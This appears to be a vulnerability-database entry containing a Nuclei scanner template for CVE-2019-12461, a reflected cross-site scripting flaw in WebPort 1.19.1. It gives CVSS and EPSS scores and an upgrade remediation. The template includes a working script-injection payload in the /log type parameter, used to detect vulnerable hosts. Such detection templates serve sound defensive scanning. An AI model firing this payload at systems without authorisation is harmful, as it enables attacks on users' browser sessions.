Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-12461
HistorySep 03, 2020 - 12:37 p.m.

WebPort 1.19.1 - Cross-Site Scripting

2020-09-0312:37:18
ProjectDiscovery
github.com
4
webport
cross-site scripting
vulnerability
execution
javascript
upgrade
version 1.19.2
cve-2019-12461
cwe-79
mediumseverity

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.004

Percentile

71.9%

Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.

id: CVE-2019-12461

info:
  name: WebPort 1.19.1 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability.
  reference:
    - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
    - https://webport.se/nedladdningar/
    - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
    - https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12461
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-12461
    cwe-id: CWE-79
    epss-score: 0.0035
    epss-percentile: 0.71796
    cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: webport
    product: web_port
  tags: cve,cve2019,xss,webport

http:
  - method: GET
    path:
      - '{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"</script><script>alert(document.domain);</script><script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f8a68184a00bd30b2c7e8380fe2352c186c6408c83372b7c32cec79a0e41f3b6022029e2365306b2fed019cbf46e02ce63203a3c5e4672286b5e08367bf26cc52b1e:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.004

Percentile

71.9%